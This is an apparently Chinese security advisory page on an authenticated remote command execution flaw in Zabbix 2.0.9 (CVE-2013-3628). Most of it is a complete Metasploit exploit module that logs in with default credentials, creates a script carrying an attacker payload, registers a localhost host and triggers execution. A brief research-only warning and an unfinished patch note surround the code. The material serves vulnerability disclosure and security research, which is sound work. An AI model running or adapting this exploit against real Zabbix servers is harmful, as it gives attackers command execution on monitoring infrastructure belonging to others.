内容安全 
大数据安全 
网络安全 
更多产品 
Zabbix任意命令执行漏洞
信息来源:Brandon Perry 发表日期:2013-10-16 17:12:00
ZABBIX是一个CS结构的分布式网络监控系统。
Zabbix 2.0.9及其他版本允许管理员在主机上运行所创建的脚本,经过身份验证的攻击者可利用此漏洞在主机上允许运行恶意脚本。
BUGTRAQ-ID:63453
CVE-ID:2013-3628
受影响系统:
ZABBIX ZABBIX v2.0.9
测试方法:
警 告!以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require \'msf/core\'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
\'Name\' => \'Zabbix Authenticated Remote Command Execution\',
\'Description\' => %q{
ZABBIX allows an administrator to create scripts that will be run on hosts.
An authenticated attacker can create a script containing a payload, then a host
with an IP of 127.0.0.1 and run the abitrary script on the ZABBIX host.
This module was tested againt Zabbix v2.0.9.
},
\'License\' => MSF_LICENSE,
\'Author\' =>
[
\'Brandon Perry <bperry.volatile[at]gmail.com>\' # Discovery / msf module
],
\'References\' =>
[
[\'CVE\', \'2013-3628\'],
[\'URL\', \'https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats\']
],
\'Payload\' =>
{
\'Compat\' =>
{
\'PayloadType\' => \'cmd\',
\'RequiredCmd\' => \'generic perl ruby bash telnet python\',
}
},
\'Platform\' => [\'unix\', \'linux\'],
\'Arch\' => ARCH_CMD,
\'Targets\' => [[\'Automatic\',{}]],
\'DisclosureDate\' => \'Oct 30 2013\',
\'DefaultTarget\' => 0
))
register_options(
[
OptString.new(\'USERNAME\', [ true, "Username to authenticate with", \'Admin\']),
OptString.new(\'PASSWORD\', [ true, "Password to authenticate with", \'zabbix\']),
OptString.new(\'TARGETURI\', [ true, "The URI of the Zabbix installation", \'/zabbix/\'])
], self.class)
end
def check
init = send_request_cgi({
\'method\' => \'GET\',
\'uri\' => normalize_uri(target_uri.path, "/index.php")
})
if !init or init.code != 200
print_error("Could not connect to server")
return Exploit::CheckCode::Unknown
end
if init.body =~ /Zabbix (2\\.0\\.(\\d)) Copyright/
if $1 >= "2.0.0" and $1 <= "2.0.8"
print_good("Version #{$1} is vulnerable.")
return Exploit::CheckCode::Vulnerable
end
end
return Exploit::CheckCode::Safe
end
def exploit
c = connect
req = c.request_cgi({
\'method\' => \'POST\',
\'uri\' => \'/zabbix/\',
\'data\' => \'request=&name=\' << datastore[\'USERNAME\'] << \'&password=\' << datastore[\'PASSWORD\'] << \'&enter=Sign+in\'
})
login = c.send_recv(req.to_s.sub("Host:", "Host: " << datastore["RHOST"]))
if !login or login.code != 302
fail_with("Login failed")
end
sess = login.headers[\'Set-Cookie\']
dash = send_request_cgi({
\'method\' => \'GET\',
\'uri\' => normalize_uri(target_uri.path, \'/dashboard.php\'),
\'cookie\' => sess
})
if !dash or dash.code != 200
fail_with("Dashboard failed")
end
sid = \'\'
dash.body.each_line do |line|
if line =~ /&sid=(.{16})\\">/
sid = $1
break
end
end
if sid == \'\'
fail_with("Could not get sid")
end
script_title = rand_text_alpha(18)
post = {
\'sid\' => sid,
\'form_refresh\' => 3,
\'form\' => \'Create+script\',
\'name\' => script_title,
\'type\' => 0,
\'execute_on\' => 1,
\'command\' => payload.encoded,
\'commandipmi\' => \'\',
\'description\' => \'\',
\'usrgrpid\' => 0,
\'groupid\' => 0,
\'access\' => 2,
\'save\' => \'Save\'
}
resp = send_request_cgi({
\'method\' => \'POST\',
\'uri\' => normalize_uri(target_uri.path, \'/scripts.php\'),
\'vars_post\' => post,
\'cookie\' => sess
})
if !resp or resp.code != 200
fail_with("Error creating script")
end
script_id = \'\'
if resp.body =~ /scriptid=(\\d{1,8})&sid=#{sid}\\">#{script_title}/
script_id = $1
else
fail_with("Could not get the script id")
end
host = rand_text_alpha(18)
post = {
\'sid\' => sid,
\'form_refresh\' => 1,
\'form\' => \'Create+host\',
\'host\' => host,
\'visiblename\' => host,
\'groups_left\' => 4,
\'newgroup\' => \'\',
\'interfaces[1][isNew]\' => true,
\'interfaces[1][interfaceid]\' => 1,
\'interfaces[1][type]\' => 1,
\'interfaces[1][ip]\' => \'127.0.0.1\',
\'interfaces[1][dns]\' => \'\',
\'interfaces[1][useip]\' => 1,
\'interfaces[1][port]\' => 10050,
\'mainInterfaces[1]\' => 1,
\'proxy_hostid\' => 0,
\'status\' => 0,
\'ipmi_authtype\' => -1,
\'ipmi_privilege\' => 2,
\'ipmi_username\' => \'\',
\'ipmi_password\' => \'\',
\'macros[0][macro]\' => \'\',
\'macros[0][value]\' => \'\',
\'inventory_mode\' => -1,
\'save\' => \'Save\',
\'groups[4]\' => 4
}
resp = send_request_cgi({
\'method\' => \'POST\',
\'uri\' => normalize_uri(target_uri.path, \'/hosts.php\'),
\'vars_post\' => post,
\'cookie\' => sess
})
if !resp or resp.code != 200
fail_with("Error creating new host")
end
hostid = \'\'
if resp.body =~ /hosts.php\\?form=update&hostid=(\\d{1,12})&groupid=(\\d)&sid=#{sid}\\">#{host}/
hostid = $1
else
fail_with("Could not get the host id")
end
send_request_cgi({
\'method\' => \'GET\',
\'uri\' => normalize_uri(target_uri.path, "/scripts_exec.php?execute=1&hostid=#{hostid}&scriptid=#{script_id}&sid=#{sid}"),
\'cookie\' => sess
})
end
end
解决办法:安装厂商补丁
厂商补丁:
ZABBIX
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
